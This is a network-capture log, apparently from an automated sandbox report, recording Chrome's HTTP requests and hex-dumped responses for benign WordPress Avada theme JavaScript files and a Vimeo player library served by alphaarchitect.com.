                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-6ae"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2a8f1542a6-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC878INData Raw: 36 61 65 0d 0a 76 61 72 20 61 77 62 4d 65 67 61 6d 65 6e 75 50 6f 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 61 2c 72 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6e 61 76 22 29 2c 69 3d 72 2e 68 61 73 43 6c 61 73 73 28 22 61 77 62 2d 6d 65 6e 75 5f 63 6f 6c 75 6d 6e 22 29 3f 22 63 6f 6c 75 6d 6e 22 3a 22 72 6f 77 22 2c 6f 3d 72 2e 61 74 74 72 28 22 64 61 74 61 2d 65 78 70 61 6e 64 22 29 2c 75 3d 22 72 69 67 68 74 22 3d 3d 3d 6f 3f 22 6c 65 66 74 22 3a 22 72 69 67 68 74 22 2c 73 3d 74 2e 61 74 74 72 28 22 64 61 74 61 2d 77 69 64 74 68 22 29 2c 6e 3d 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 2c 6c 3d 74 2e 63 6c 6f 73 65 73 74 28 22 6c 69 22 29 2c 68 3d 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2c 77 3d 6e 2d
                                                                                                                                                                                                                                                                        Data Ascii: 6aevar awbMegamenuPosition=function(t){var e,a,r=t.closest("nav"),i=r.hasClass("awb-menu_column")?"column":"row",o=r.attr("data-expand"),u="right"===o?"left":"right",s=t.attr("data-width"),n=jQuery(window).width(),l=t.closest("li"),h=t.outerWidth(),w=n-
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC839INData Raw: 67 68 74 29 2c 63 2e 72 69 67 68 74 3d 22 61 75 74 6f 22 29 3a 66 2e 6c 65 66 74 3e 68 2f 32 3f 28 63 2e 6c 65 66 74 3d 22 61 75 74 6f 22 2c 63 2e 72 69 67 68 74 3d 22 61 75 74 6f 22 29 3a 28 63 2e 6c 65 66 74 3d 22 61 75 74 6f 22 2c 63 2e 72 69 67 68 74 3d 2d 31 2a 28 68 2d 66 2e 6c 65 66 74 29 29 29 3a 28 66 3d 7b 72 69 67 68 74 3a 6e 2d 61 2c 6c 65 66 74 3a 61 2b 6c 2e 6f 75 74 65 72 57 69 64 74 68 28 29 7d 29 5b 6f 5d 3e 68 3f 28 63 5b 75 5d 3d 30 2c 63 5b 6f 5d 3d 22 61 75 74 6f 22 29 3a 66 5b 75 5d 3e 68 3f 28 63 5b 6f 5d 3d 30 2c 63 5b 75 5d 3d 22 61 75 74 6f 22 29 3a 28 63 5b 75 5d 3d 2d 31 2a 28 68 2d 66 5b 6f 5d 29 2c 63 5b 6f 5d 3d 22 61 75 74 6f 22 29 2c 74 2e 63 73 73 28 63 29 29 3a 28 66 3d 7b 72 69 67 68 74 3a 6e 2d 28 61 2b 6c 2e 6f 75 74
                                                                                                                                                                                                                                                                        Data Ascii: ght),c.right="auto"):f.left>h/2?(c.left="auto",c.right="auto"):(c.left="auto",c.right=-1*(h-f.left))):(f={right:n-a,left:a+l.outerWidth()})[o]>h?(c[u]=0,c[o]="auto"):f[u]>h?(c[o]=0,c[u]="auto"):(c[u]=-1*(h-f[o]),c[o]="auto"),t.css(c)):(f={right:n-(a+l.out
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        129192.168.2.449887141.193.213.104435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC837OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-tooltip.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                        Referer: https://alphaarchitect.com/2024/12/long-term-expected-returns/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-350"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2afc598c60-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC855INData Raw: 33 35 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 75 73 69 6f 6e 49 6e 69 74 54 6f 6f 6c 74 69 70 73 28 29 7b 6a 51 75 65 72 79 28 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 74 6f 6f 6c 74 69 70 22 5d 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 66 75 73 69 6f 6e 2d 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 29 2e 6c 65 6e 67 74 68 3f 22 2e 66 75 73 69 6f 6e 2d 68 65 61 64 65 72 2d 77 72 61 70 70 65 72 22 3a 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 23 73 69 64 65 2d 68 65 61 64 65 72 22 29 2e 6c 65 6e 67 74 68 3f 22 23 73 69 64 65 2d 68 65 61 64 65 72 22 3a 22 62 6f 64 79 22 2c 28 21 63 73 73 75 61 2e 75 61 2e 6d 6f 62 69 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 350function fusionInitTooltips(){jQuery('[data-toggle="tooltip"]').each(function(){var e;e=jQuery(this).parents(".fusion-header-wrapper").length?".fusion-header-wrapper":jQuery(this).parents("#side-header").length?"#side-header":"body",(!cssua.ua.mobile
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        130192.168.2.449888141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC630OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/general/fusion-general-global.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-1a3"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2b799d7d1e-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC426INData Raw: 31 61 33 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 48 6f 76 65 72 54 6f 75 63 68 53 74 61 74 65 28 29 7b 76 61 72 20 6f 2c 65 3d 21 31 3b 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 6f 75 63 68 73 74 61 72 74 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6f 29 2c 65 3d 21 30 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 74 6f 75 63 68 22 29 2c 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 75 73 69 6f 6e 2d 6e 6f 2d 74 6f 75 63 68 22 29 2c 6f 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 3d 21 31 7d 2c 35 30 30 29 7d 2c 7b 70 61 73 73 69 76 65 3a 21 30 7d 29 2c
                                                                                                                                                                                                                                                                        Data Ascii: 1a3function checkHoverTouchState(){var o,e=!1;document.addEventListener("touchstart",function(){clearTimeout(o),e=!0,jQuery("body").addClass("fusion-touch"),jQuery("body").removeClass("fusion-no-touch"),o=setTimeout(function(){e=!1},500)},{passive:!0}),
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        131192.168.2.449889141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC616OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-general-footer.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-19c"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2b8a2072a5-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC419INData Raw: 31 39 63 0d 0a 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 66 6f 6f 74 65 72 20 2e 66 75 73 69 6f 6e 2d 66 6f 6f 74 65 72 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 66 75 73 69 6f 6e 2d 63 6f 6c 75 6d 6e 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 69 73 28 22 3a 65 6d 70 74 79 22 29 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 73 73 28 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 22 2c 22 30 22 29 7d 29 2c 6a 51 75 65 72 79 28 22 2e 66 75 73 69 6f 6e 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 66 6f 6f 74 65 72 22 29 2e 66 69 6e 64 28 22 2e 66 75 73 69 6f 6e 2d 73 6f 63 69 61 6c 2d 6e 65 74 77 6f 72 6b
                                                                                                                                                                                                                                                                        Data Ascii: 19cjQuery(document).ready(function(){jQuery(".fusion-footer .fusion-footer-widget-area .fusion-column").each(function(){jQuery(this).is(":empty")&&jQuery(this).css("margin-bottom","0")}),jQuery(".fusion-social-links-footer").find(".fusion-social-network
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        132192.168.2.449890141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC610OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/assets/min/js/general/avada-quantity.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:02 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-806"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147819
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2bbb70440b-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC878INData Raw: 38 30 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 76 61 64 61 41 64 64 51 75 61 6e 74 69 74 79 42 6f 78 65 73 28 74 2c 61 29 7b 76 61 72 20 65 3d 21 31 2c 6e 3d 6a 51 75 65 72 79 28 22 62 6f 64 79 22 29 2e 68 61 73 43 6c 61 73 73 28 22 77 63 6f 70 63 2d 70 72 6f 64 75 63 74 2d 73 69 6e 67 6c 65 22 29 3b 74 7c 7c 28 74 3d 22 2e 71 74 79 22 29 2c 61 7c 7c 28 61 3d 6a 51 75 65 72 79 28 22 64 69 76 2e 71 75 61 6e 74 69 74 79 3a 6e 6f 74 28 2e 62 75 74 74 6f 6e 73 5f 61 64 64 65 64 29 2c 20 74 64 2e 71 75 61 6e 74 69 74 79 3a 6e 6f 74 28 2e 62 75 74 74 6f 6e 73 5f 61 64 64 65 64 29 22 29 2e 66 69 6e 64 28 74 29 29 2c 61 2e 6c 65 6e 67 74 68 26 26 28 6a 51 75 65 72 79 2e 65 61 63 68 28 61 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 61 29 7b 22 64 61 74 65 22 3d 3d 3d 6a 51
                                                                                                                                                                                                                                                                        Data Ascii: 806function avadaAddQuantityBoxes(t,a){var e=!1,n=jQuery("body").hasClass("wcopc-product-single");t||(t=".qty"),a||(a=jQuery("div.quantity:not(.buttons_added), td.quantity:not(.buttons_added)").find(t)),a.length&&(jQuery.each(a,function(t,a){"date"===jQ
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC1183INData Raw: 2c 20 2e 6d 69 6e 75 73 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 74 29 2c 65 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 76 61 6c 28 29 29 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 61 74 74 72 28 22 6d 61 78 22 29 29 2c 6f 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 61 74 74 72 28 22 6d 69 6e 22 29 29 2c 75 3d 61 2e 61 74 74 72 28 22 73 74 65 70 22 29 3b 65 26 26 22 22 21 3d 3d 65 26 26 22 4e 61 4e 22 21 3d 3d 65 7c 7c 28 65 3d 30 29 2c 22 22 21 3d 3d 69 26 26 22 4e 61 4e 22 21 3d 3d 69 7c 7c 28 69 3d 22 22 29 2c 22 22 21 3d 3d 6f 26 26 22 4e 61 4e 22 21 3d 3d 6f 7c 7c 28 6f 3d 30 29 2c 22 61 6e 79 22 21 3d 3d 75 26 26 22
                                                                                                                                                                                                                                                                        Data Ascii: , .minus").on("click",function(){var a=jQuery(this).parent().find(t),e=parseFloat(a.val()),i=parseFloat(a.attr("max")),o=parseFloat(a.attr("min")),u=a.attr("step");e&&""!==e&&"NaN"!==e||(e=0),""!==i&&"NaN"!==i||(i=""),""!==o&&"NaN"!==o||(o=0),"any"!==u&&"
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        133192.168.2.449891141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:45:02 UTC620OUTGET /wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/vimeoPlayer.js?ver=1733842125 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:45:03 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 10 Dec 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                        ETag: W/"675854cd-94a8"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147820
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba2f7e9ac42a-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:45:03 UTC877INData Raw: 37 64 63 35 0d 0a 2f 2a 21 20 40 76 69 6d 65 6f 2f 70 6c 61 79 65 72 20 76 32 2e 32 33 2e 30 20 7c 20 28 63 29 20 32 30 32 34 20 56 69 6d 65 6f 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 76 69 6d 65 6f 2f 70 6c 61 79 65 72 2e 6a 73 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d
                                                                                                                                                                                                                                                                        Data Ascii: 7dc5/*! @vimeo/player v2.23.0 | (c) 2024 Vimeo | MIT License | https://github.com/vimeo/player.js */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):((e="undefined"!=
